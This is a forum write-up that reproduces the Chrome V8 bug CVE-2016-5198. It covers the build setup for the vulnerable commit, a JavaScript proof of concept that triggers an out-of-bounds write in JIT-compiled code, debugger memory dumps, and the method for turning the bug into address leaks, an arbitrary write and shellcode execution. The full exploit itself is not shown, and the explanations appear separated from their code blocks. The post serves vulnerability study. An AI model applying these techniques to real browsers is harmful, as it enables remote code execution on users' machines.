Reproducing Chrome V8 CVE-2016-5198
Posted: 2024-8-25 22:06


(A note on why Python 2.7 has to be installed: this vulnerability lives in an old V8 version, and at that commit the build/sync scripts still use Python 2 syntax; running them with Python 3 produces a pile of errors.)

I chose to make Python 2.7 the default version here.

Here I chose to set a global HTTP proxy for the shell and a git proxy.

After that, configure the proxy that depot_tools uses when downloading packages.

At this point V8 has been built.

At this point the environment setup is complete.

Pull and build

Output:

With --print-code we can see the full difference in machine code before and after JIT optimization; the part to watch is the optimization of the Check function.

Modify poc.js to add natives syntax, which makes debugging easier, then start gdb.

After the natives-syntax call %SystemBreak() stops execution, look at the printed information.

The job command shows annotated assembly together with the actual addresses of the machine code.

Now we can set breakpoints on the parts we are interested in; break directly at the start of the load-address-then-store sequence.

We can see that the FixedArray's length is 0 at this point, so writing into it is an out-of-bounds array write.
The FixedArray before the out-of-bounds write:

Before the out-of-bounds write, first look at what each entry is:

So before the out-of-bounds write, the memory layout of the FixedArray is:

Arriving at the instruction that performs the out-of-bounds write:

Verify after single-stepping:

Before building the exploit, let's first observe a pattern.

For the Check function above, after many loop iterations the JIT engine optimizes it; the assembly for the assignments to n is as follows:

We can see that only n.xyz treats the data at [[rax+0x7] + offset] as a pointer; the other properties are written directly to [[rax+0x7] + offset].

If we change the JS to a different form:

The optimized assembly then becomes:

From this we can summarize a rule: whenever a floating-point number is written (the reference article explains that this really applies to any non-smi assignment), the write target is the memory pointed to by the pointer stored at [[rax+0x7] + offset];
if an smi is written, it is written directly at [[rax+0x7] + offset].

Build the payload as follows:

Debug and observe the memory:

In this way we place the address of the Check JSFunction structure into the value field of the null string, and str.charCodeAt(x) then lets us read out each byte.

As above, combining those bytes leaks the target address that was placed in the string's value field.

From the rule in the previous section, writing a non-smi writes to the address pointed to by [[rax+0x7] + offset]. So if the location [[rax+0x7] + offset] points to is [rax+0x7] itself, do we get an arbitrary address write?

That is, the memory we want to construct looks like this:

This memory structure is null(string).value -> &null(string). We then create another optimized function whose store target is a pointer, which lets us write an arbitrary floating-point value to an arbitrary address (arbitrary write achieved),
as follows:

After the arbitrary write, the memory structure is as we expected:

Here is the idea behind the exploit directly:
Once we have an arbitrary write, we can define a function and then modify the pointer to that function's machine code so that it points at another array buffer we allocated,
into which we write the real shellcode.
See the full exploit section later for the code.

The shellcode can be generated with msf.

Then arrange it in a form we can use.

Exploitation result

For exploitation research, I believe a systematic study from older to newer vulnerabilities gives a better understanding of how they evolved, builds familiarity with the system, and sharpens exploitation techniques, eventually forming one's own methodology. But because this vulnerability is fairly old, the environment-setup parts of many write-ups from that time no longer work and are full of pitfalls. After a lot of fiddling with the environment I finally found a working path, so I am sharing it for everyone who wants to get started.

sudo apt update
sudo apt upgrade
sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
sudo apt install bison cdbs curl flex g++ git vim pkg-config make lbzip2 clang openssl libssl-dev libncurses5
sudo apt-get install build-essential checkinstall libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
wget https://www.python.org/ftp/python/2.7.18/Python-2.7.18.tgz
tar xzf Python-2.7.18.tgz
cd Python-2.7.18
./configure --enable-optimizations
sudo make altinstall
sudo ln -sfn '/usr/local/bin/python2.7' '/usr/bin/python2'
sudo update-alternatives --install /usr/bin/python python /usr/bin/python2 1
sudo update-alternatives --install /usr/bin/python python /usr/bin/python3  2
sudo update-alternatives --config python  # select the Python version to switch to
python --version                          # check the Python version
wget http://archive.ubuntu.com/ubuntu/pool/universe/n/ncurses/libtinfo5_6.4-2_amd64.deb
sudo dpkg -i libtinfo5_6.4-2_amd64.deb
git config --global http.proxy 172.16.185.1:1087
echo 'export http_proxy="172.16.185.1:1087"' >> ~/.bashrc
echo 'export https_proxy=$http_proxy' >> ~/.bashrc
echo '[Boto]' >> ~/.boto.cfg
echo 'proxy=http://172.16.185.1' >> ~/.boto.cfg
echo 'proxy_port=1087' >> ~/.boto.cfg
echo 'export NO_AUTH_BOTO_CONFIG=/home/jojo/.boto.cfg' >> ~/.bashrc
git clone https://github.com/ninja-build/ninja.git
cd ninja
./configure.py --bootstrap
echo 'export PATH=$PATH:"/home/jojo/Desktop/ninja"' >> ~/.bashrc
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
echo 'export PATH=$PATH:"/home/jojo/Desktop/depot_tools"' >> ~/.bashrc
source ~/.bashrc
fetch v8
# This step takes quite a while; as long as there is no error it is fine, just wait
cd v8
# Check out the specific vulnerable revision; this is the version needed for CVE-2016-5198
git checkout a7a350012c05f644f3f373fb48d7ac72f7f60542
gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug
sudo update-alternatives --config python
sudo apt-get update
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip --break-system-packages
python3 -m pip install --upgrade pwntools --break-system-packages
git config --global --unset http.proxy
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
source /home/jojo/pwndbg/gdbinit.py
source /home/jojo/Desktop/v8/tools/gdbinit
source /home/jojo/Desktop/v8/tools/gdb-v8-support.py
// DebugPrint prints the target object's memory address and its main fields
%DebugPrint(a);

// This call sets a breakpoint from within the script
%SystemBreak();
pwndbg> r --allow-natives-syntax poc.js
pwndbg> job 0x1ee6f58ab791
0x1ee6f58ab791: [Function]
 - map = 0x2ce9b88840f1 [FastProperties]
 - prototype = 0x1ee6f58840b9
 - elements = 0xc9b5f282241 <FixedArray[0]> [FAST_HOLEY_ELEMENTS]
 - initial_map =
./v8/out.gn/x64.debug/d8 --allow-natives-syntax --print-code poc.js
# these steps need python2
git checkout a7a350012c05f644f3f373fb48d7ac72f7f60542
gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug d8
function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;
  parseInt();
}
for(var i=0; i<2000; ++i) {
  Ctor();
}
for(var i=0; i<2000; ++i) {
  Check();
}
 
Ctor();
Check();
jojo@pwn:/mnt/hgfs/v8/CVE-2016-5198$ ~/Desktop/v8/out.gn/x64.debug/d8 poc.js
Received signal 11 <unknown> 000000000000
 
==== C stack trace ===============================
 
 [0x796675dd8a4e]
 [0x796675dd89a5]
 [0x796673c45320]
 [0x796674a2a0d5]
 [0x7966752e3ecb]
 [0x7966754c4bfa]
 [0x7966754c4639]
 [0x365abda043a7]
[end of stack trace]
Segmentation fault (core dumped)
jojo@pwn:/mnt/hgfs/v8/CVE-2016-5198$ ~/Desktop/v8/out.gn/x64.debug/d8 poc.js --print-code
...
 
//---------------------------- before optimization -------------------------------
--- Raw source ---
() {
    n.xyz = 0x826852f4;
    parseInt();
  }
--- Code ---
source_position = 57
kind = FUNCTION
name = Check
compiler = full-codegen
Instructions (size = 212)
0x247968a869c0     0  55             push rbp
0x247968a869c1     1  4889e5         REX.W movq rbp,rsp
0x247968a869c4     4  56             push rsi
0x247968a869c5     5  57             push rdi
0x247968a869c6     6  488b4f2f       REX.W movq rcx,[rdi+0x2f]
0x247968a869ca    10  488b490f       REX.W movq rcx,[rcx+0xf]
0x247968a869ce    14  83411b01       addl [rcx+0x1b],0x1
0x247968a869d2    18  493ba5600c0000 REX.W cmpq rsp,[r13+0xc60]
0x247968a869d9    25  7305           jnc 32  (0x247968a869e0)
0x247968a869db    27  e800bff5ff     call StackCheck  (0x2479689e28e0)    ;; code: BUILTIN
0x247968a869e0    32  48b80000000002000000 REX.W movq rax,0x200000000
0x247968a869ea    42  e8f1d9ffff     call 0x247968a843e0     ;; code: LOAD_GLOBAL_IC
0x247968a869ef    47  50             push rax
0x247968a869f0    48  48b881c3c2ba80280000 REX.W movq rax,0x2880bac2c381    ;; object: 0x2880bac2c381 <Number: 2.18788e+09>
0x247968a869fa    58  5a             pop rdx
0x247968a869fb    59  48b919b0c2ba80280000 REX.W movq rcx,0x2880bac2b019    ;; object: 0x2880bac2b019 <String[3]: xyz>
0x247968a86a05    69  48bf0000000004000000 REX.W movq rdi,0x400000000
//---------------------------------------------- Property assignment before optimization: LOAD_GLOBAL_IC / STORE_IC calls are used to store the xyz data
0x247968a86a0f    79  e84cb8f0ff     call 0x247968992260     ;; code: STORE_IC
//----------------------------------------------
0x247968a86a14    84  488b75f8       REX.W movq rsi,[rbp-0x8]
0x247968a86a18    88  48b80000000008000000 REX.W movq rax,0x800000000
0x247968a86a22    98  e8b9d9ffff     call 0x247968a843e0     ;; code: LOAD_GLOBAL_IC
0x247968a86a27   103  50             push rax
0x247968a86a28   104  49ba1123c8293c130000 REX.W movq r10,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86a32   114  4152           push r10
0x247968a86a34   116  48ba0000000006000000 REX.W movq rdx,0x600000000
0x247968a86a3e   126  488b7c2408     REX.W movq rdi,[rsp+0x8]
0x247968a86a43   131  33c0           xorl rax,rax
0x247968a86a45   133  e8f6ddffff     call 0x247968a84840     ;; code: CALL_IC
0x247968a86a4a   138  488b75f8       REX.W movq rsi,[rbp-0x8]
0x247968a86a4e   142  4883c408       REX.W addq rsp,0x8
0x247968a86a52   146  498b45a0       REX.W movq rax,[r13-0x60]
0x247968a86a56   150  48bb61c4c2ba80280000 REX.W movq rbx,0x2880bac2c461    ;; object: 0x2880bac2c461 Cell for 6144
0x247968a86a60   160  83430bd1       addl [rbx+0xb],0xd1
0x247968a86a64   164  791f           jns 197  (0x247968a86a85)
0x247968a86a66   166  50             push rax
0x247968a86a67   167  e8f4bdf5ff     call InterruptCheck  (0x2479689e2860)    ;; code: BUILTIN
0x247968a86a6c   172  58             pop rax
0x247968a86a6d   173  48bb61c4c2ba80280000 REX.W movq rbx,0x2880bac2c461    ;; object: 0x2880bac2c461 Cell for 6144
0x247968a86a77   183  49ba0000000000180000 REX.W movq r10,0x180000000000
0x247968a86a81   193  4c895307       REX.W movq [rbx+0x7],r10
0x247968a86a85   197  c9             leavel
0x247968a86a86   198  c20800         ret 0x8
0x247968a86a89   201  0f1f8000000000 nop
 
//---------------------------- after optimization -------------------------------
--- Code ---
0x247968a86c40     0  55             push rbp
0x247968a86c41     1  4889e5         REX.W movq rbp,rsp
0x247968a86c44     4  56             push rsi
0x247968a86c45     5  57             push rdi
0x247968a86c46     6  4883ec08       REX.W subq rsp,0x8
0x247968a86c4a    10  488b45f8       REX.W movq rax,[rbp-0x8]
0x247968a86c4e    14  488945e8       REX.W movq [rbp-0x18],rax
0x247968a86c52    18  488bf0         REX.W movq rsi,rax
0x247968a86c55    21  493ba5600c0000 REX.W cmpq rsp,[r13+0xc60]
0x247968a86c5c    28  7305           jnc 35  (0x247968a86c63)
0x247968a86c5e    30  e87dbcf5ff     call StackCheck  (0x2479689e28e0)    ;; code: BUILTIN
0x247968a86c63    35  48b859bdc2ba80280000 REX.W movq rax,0x2880bac2bd59    ;; object: 0x2880bac2bd59 PropertyCell for 0x2d4f15ad45e9 <a Set with map 0xf3399b8c391>
0x247968a86c6d    45  488b400f       REX.W movq rax,[rax+0xf]
//---------------------------------------------------------------- After optimization the LOAD_GLOBAL_IC / STORE_IC calls are gone, replaced by direct memory accesses
// Because the Set's FixedArray has not had any space allocated yet, writing here produces an out-of-bounds array write
0x247968a86c71    49  49ba0000805e0a4de041 REX.W movq r10,0x41e04d0a5e800000
0x247968a86c7b    59  c4c1f96ec2     vmovq xmm0,r10
0x247968a86c80    64  488b4007       REX.W movq rax,[rax+0x7]
0x247968a86c84    68  488b400f       REX.W movq rax,[rax+0xf]
0x247968a86c88    72  c5fb114007     vmovsd [rax+0x7],xmm0
//----------------------------------------------------------------
0x247968a86c8d    77  49ba1123c8293c130000 REX.W movq r10,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86c97    87  4152           push r10
0x247968a86c99    89  48bf51d8c0ba80280000 REX.W movq rdi,0x2880bac0d851    ;; object: 0x2880bac0d851 <JS Function parseInt (SharedFunctionInfo 0x133c29cbce11)>
0x247968a86ca3    99  488b75e8       REX.W movq rsi,[rbp-0x18]
0x247968a86ca7   103  488b7727       REX.W movq rsi,[rdi+0x27]
0x247968a86cab   107  498b55a0       REX.W movq rdx,[r13-0x60]
0x247968a86caf   111  33c0           xorl rax,rax
0x247968a86cb1   113  bb02000000     movl rbx,0x2
0x247968a86cb6   118  e845efefff     call ArgumentsAdaptorTrampoline  (0x247968985c00)    ;; code: BUILTIN
0x247968a86cbb   123  48b81123c8293c130000 REX.W movq rax,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86cc5   133  488be5         REX.W movq rsp,rbp
0x247968a86cc8   136  5d             pop rbp
0x247968a86cc9   137  c20800         ret 0x8
function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;
  parseInt();
}
for(var i=0; i<2000; ++i) {
  Ctor();
}
for(var i=0; i<2000; ++i) {
  Check();
}

Ctor();
%DebugPrint(Check);
%SystemBreak();
Check();
DebugPrint: 0x3bf28ee2b7d1: [Function]
 - map = 0x43323040f1 [FastProperties]
 - prototype = 0x3bf28ee040b9
 - elements = 0xcd748382241 <FixedArray[0]> [FAST_HOLEY_ELEMENTS]
 - initial_map =
 - shared_info = 0x3bf28ee2b379 <SharedFunctionInfo Check>
 - name = 0x3bf28ee2aff9 <String[5]: Check>
 - formal_parameter_count = 0
 - context = 0x3bf28ee03951 <FixedArray[235]>
 - literals = 0x3bf28ee2c591 <FixedArray[1]>
 - code = 0x3c1871406c21 <Code: OPTIMIZED_FUNCTION>  // The JSFunction field to focus on; the job command can inspect it in gdb
pwndbg> job 0x3c1871406c21
0x3c1871406c21: [Code]
kind = OPTIMIZED_FUNCTION
stack_slots = 5
compiler = crankshaft
Instructions (size = 170)
0x3c1871406c80     0  55             push rbp
0x3c1871406c81     1  4889e5         REX.W movq rbp,rsp
...
  ► 0x3c1871406ca3    movabs rax, 0x3bf28ee2bdb1              RAX => 0x3bf28ee2bdb1 ◂— 0xb1cecb02a
    0x3c1871406cad    mov    rax, qword ptr [rax + 0xf]       RAX, [0x3bf28ee2bdc0] => 0x13869995c4f1 ◂— 0x4100000043323065 /* 'e02C' */
    0x3c1871406cb1    movabs r10, 0x41e04d0a5e800000          R10 => 0x41e04d0a5e800000
    0x3c1871406cbb    vmovq  xmm0, r10
    0x3c1871406cc0    mov    rax, qword ptr [rax + 7]         RAX, [0x13869995c4f8] => 0xcd748382241 ◂— 0xb1cecb023
    0x3c1871406cc4    mov    rax, qword ptr [rax + 0xf]       RAX, [0xcd748382250] => 0xb1cecb02361 ◂— 0xb1cecb022
 
pwndbg> job 0x3bf28ee2bdb1
0x3bf28ee2bdb1: [PropertyCell]
 - value: 0x13869995c4f1 <a Set with map 0x4332306509>
 - details: (data, dictionary_index: 138, attrs: [WEC])
 - cell_type: ConstantType (StableMap)
   0x2c6522e06ca3    movabs rax, 0xbc7b43abdb1              RAX => 0xbc7b43abdb1 ◂— 0x3f7561c02a
   0x2c6522e06cad    mov    rax, qword ptr [rax + 0xf]      RAX, [0xbc7b43abdc0] => 0x290ed79dc4f1 ◂— 0x410000196777e865
   0x2c6522e06cb1    movabs r10, 0x41e04d0a5e800000         R10 => 0x41e04d0a5e800000
   0x2c6522e06cbb    vmovq  xmm0, r10
 ► 0x2c6522e06cc0    mov    rax, qword ptr [rax + 7]        RAX, [0x290ed79dc4f8] => 0x3e4915602241 ◂— 0x3f7561c023
   0x2c6522e06cc4    mov    rax, qword ptr [rax + 0xf]      RAX, [0x3e4915602250] => 0x3f7561c02361 ◂— 0x3f7561c022
   0x2c6522e06cc8    vmovsd qword ptr [rax + 7], xmm0
   0x2c6522e06ccd    movabs r10, 0x3e4915602311             R10 => 0x3e4915602311 ◂— 0x3f7561c024
   0x2c6522e06cd7    push   r10
   0x2c6522e06cd9    movabs rdi, 0xbc7b438d851              RDI => 0xbc7b438d851 ◂— 0x410000196777e82a
   0x2c6522e06ce3    mov    rsi, qword ptr [rbp - 0x18]     RSI, [0x7ffd0ebafdf8] => 0xbc7b4383951 ◂— 0x3f7561c02c
 
pwndbg> job $rax
0x13869995c4f1: [JSSet]
 - map = 0x4332306509 [FastProperties]
 - prototype = 0x3bf28ee15e49
 - elements = 0xcd748382241 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS] - table = 0x13869995c511 <FixedArray[13]>
 - properties = {
 }
pwndbg>  x/4gx $rax-1
0x13869995c4f0: 0x0000004332306509      0x00000cd748382241
0x13869995c500: 0x00000cd748382241      0x000013869995c511
pwndbg> job 0x00000cd748382241
0xcd748382241: [FixedArray]
 - length: 0
pwndbg> x/6gx 0x00000cd748382240
0xcd748382240:  0x00000b1cecb02309      0x0000000000000000
0xcd748382250:  0x00000b1cecb02361      0x00000000803b1506
0xcd748382260:  0x0000000400000000      0xdeadbeed6c6c756e
pwndbg> job 0x00000b1cecb02309
0xb1cecb02309: [Map]
 - type: FIXED_ARRAY_TYPE
 - instance size: 0
 - elements kind: FAST_HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - non-extensible
 - back pointer: 0xcd748382311 <undefined>
 - instance descriptors (own) #0: 0xcd748382231 <FixedArray[0]>
 - layout descriptor: 0
 - prototype: 0xcd748382201 <null>
 - constructor: 0xcd748382201 <null>
 - code cache: 0xcd748382241 <FixedArray[0]>
 - dependent code: 0xcd748382241 <FixedArray[0]>
 - construction counter: 0
 
pwndbg> job 0x00000b1cecb02361
0xb1cecb02361: [Map]
 - type: ONE_BYTE_INTERNALIZED_STRING_TYPE
 - instance size: 0
 - elements kind: FAST_HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0xcd748382311 <undefined>
 - instance descriptors (own) #0: 0xcd748382231 <FixedArray[0]>
 - layout descriptor: 0
 - prototype: 0xcd748382201 <null>
 - constructor: 0xcd748382201 <null>
 - code cache: 0xcd748382241 <FixedArray[0]>
 - dependent code: 0xcd748382241 <FixedArray[0]>
 - construction counter: 0
pwndbg> x/6gx 0x00000cd748382240
0xcd748382240:  0x00000b1cecb02309 (FIXED_ARRAY_TYPE)                       0x0000000000000000
0xcd748382250:  0x00000b1cecb02361 (ONE_BYTE_INTERNALIZED_STRING_TYPE)      0x00000000803b1506
0xcd748382260:  0x0000000400000000                                          0xdeadbeed6c6c756e
   0x3c1871406cc0    mov    rax, qword ptr [rax + 7]         RAX, [0x13869995c4f8] => 0xcd748382241 ◂— 0xb1cecb023
   0x3c1871406cc4    mov    rax, qword ptr [rax + 0xf]       RAX, [0xcd748382250] => 0xb1cecb02361 ◂— 0xb1cecb022
 ► 0x3c1871406cc8    vmovsd qword ptr [rax + 7], xmm0
   0x3c1871406ccd    movabs r10, 0xcd748382311               R10 => 0xcd748382311 ◂— 0xb1cecb024
 
pwndbg> x/6gx $rax-1
0xb1cecb02360:  0x00000b1cecb02259      0x0019000400007300  <- so the out-of-bounds write lands at this location
0xb1cecb02370:  0x00000000082003ff      0x00000cd748382201
0xb1cecb02380:  0x00000cd748382201      0x0000000000000000
pwndbg> x/6gx $rax-1
0xb1cecb02360:  0x00000b1cecb02259      0x41e04d0a5e800000 <- overflow succeeded, corrupting the ONE_BYTE_INTERNALIZED_STRING_TYPE structure
0xb1cecb02370:  0x00000000082003ff      0x00000cd748382201
0xb1cecb02380:  0x00000cd748382201      0x0000000000000000
 
# Parsing the structure with the job command now fails as well:
pwndbg> job 0xb1cecb02361
0xb1cecb02361: [Map]
 - type: EXTERNAL_INTERNALIZED_STRING_WITH_ONE_BYTE_DATA_TYPE
 - instance size: 0
 - elements kind:
#
# Fatal error in ../../src/elements.h, line 28
# Check failed: static_cast<int>(elements_kind) < kElementsKindCount.
function Check(obj) {                   // n is the object set up earlier in the PoC
    n.xyz = 3.4766863919152113e-308;    // double (non-smi): stored through the pointer held at [[rax+0x7] + offset]
    n.xyz1 = 0x0;                       // smi: written straight into the in-object slot
    n.xyz2 = 0x7000;                    // smi: written straight into the in-object slot
    n.xyz3 = obj;                       // null: tagged value written straight into the slot
}
for (var i = 0; i < 10000; ++i) {       // warm up so the JIT optimizes Check
    Check(null);
}
0x211408780d    45  488b400f       REX.W movq rax,[rax+0xf]
0x2114087811    49  49ba0073000004001900 REX.W movq r10,0x19000400007300
0x211408781b    59  c4c1f96ec2     vmovq xmm0,r10
0x2114087820    64  488b5807       REX.W movq rbx,[rax+0x7]
0x2114087824    68  488b5b0f       REX.W movq rbx,[rbx+0xf]
0x2114087828    72  c5fb114307     vmovsd [rbx+0x7],xmm0      // n.xyz
0x211408782d    77  488b5807       REX.W movq rbx,[rax+0x7]
0x2114087831    81  c7431b00000000 movl [rbx+0x1b],0x0        // n.xyz1
0x2114087838    88  488b5807       REX.W movq rbx,[rax+0x7]
0x211408783c    92  c7432300700000 movl [rbx+0x23],0x7000     // n.xyz2
0x2114087843    99  488b5d10       REX.W movq rbx,[rbp+0x10]
0x2114087847   103  f6c301         testb rbx,0x1
0x211408784a   106  0f843f000000   jz 175  (0x211408788f)
0x2114087850   112  488b5007       REX.W movq rdx,[rax+0x7]
0x2114087854   116  48895a27       REX.W movq [rdx+0x27],rbx  //n.xyz3
function Check(obj) {                   // n is the object set up earlier in the PoC
    n.xyz = 3.4766863919152113e-308;    // every field now receives a double (non-smi) ...
    n.xyz1 = 3.5766863919152113e-308;   // ... so each store goes through the pointer held at [[rax+0x7] + offset]
    n.xyz2 = 3.6766863919152113e-308;
    n.xyz3 = obj;                       // obj is a double as well, so the JIT unboxes it and stores it the same way
}
for (var i = 0; i < 10000; ++i) {       // warm up so the JIT optimizes Check with these field representations
    Check(3.4766863919152113e-308);
}
0x14de39186f6d    45  488b400f       REX.W movq rax,[rax+0xf]
0x14de39186f71    49  49ba0073000004001900 REX.W movq r10,0x19000400007300
0x14de39186f7b    59  c4c1f96ec2     vmovq xmm0,r10
0x14de39186f80    64  488b5807       REX.W movq rbx,[rax+0x7]
0x14de39186f84    68  488b5b0f       REX.W movq rbx,[rbx+0xf]
0x14de39186f88    72  c5fb114307     vmovsd [rbx+0x7],xmm0    // n.xyz
0x14de39186f8d    77  49baaf70697219b81900 REX.W movq r10,0x19b819726970af
0x14de39186f97    87  c4c1f96ec2     vmovq xmm0,r10
0x14de39186f9c    92  488b5807       REX.W movq rbx,[rax+0x7]
0x14de39186fa0    96  488b5b17       REX.W movq rbx,[rbx+0x17]
0x14de39186fa4   100  c5fb114307     vmovsd [rbx+0x7],xmm0    // n.xyz1
0x14de39186fa9   105  49ba5d6ed2e42e701a00 REX.W movq r10,0x1a702ee4d26e5d
0x14de39186fb3   115  c4c1f96ec2     vmovq xmm0,r10
0x14de39186fb8   120  488b5807       REX.W movq rbx,[rax+0x7]
0x14de39186fbc   124  488b5b1f       REX.W movq rbx,[rbx+0x1f]
0x14de39186fc0   128  c5fb114307     vmovsd [rbx+0x7],xmm0    // n.xyz2
0x14de39186fc5   133  488b4007       REX.W movq rax,[rax+0x7]
0x14de39186fc9   137  488b4027       REX.W movq rax,[rax+0x27]
0x14de39186fcd   141  488b5d10       REX.W movq rbx,[rbp+0x10]
0x14de39186fd1   145  f6c301         testb rbx,0x1
0x14de39186fd4   148  7415           jz 171  (0x14de39186feb)
0x14de39186fd6   150  4d8b5560       REX.W movq r10,[r13+0x60]
0x14de39186fda   154  4c3953ff       REX.W cmpq [rbx-0x1],r10
0x14de39186fde   158  c5fb104307     vmovsd xmm0,[rbx+0x7]
0x14de39186fe3   163  0f8528000000   jnz 209  (0x14de39187011)
0x14de39186fe9   169  eb10           jmp 187  (0x14de39186ffb)
0x14de39186feb   171  4c8bd3         REX.W movq r10,rbx
0x14de39186fee   174  49c1ea20       REX.W shrq r10, 32
0x14de39186ff2   178  c5f957c0       vxorpd xmm0,xmm0,xmm0
0x14de39186ff6   182  c4c17b2ac2     vcvtlsi2sd xmm0,xmm0,r10
0x14de39186ffb   187  c5fb114007     vmovsd [rax+0x7],xmm0    // n.xyz3

Last edited by JoJoRun on 2024-8-25 22:16, reason: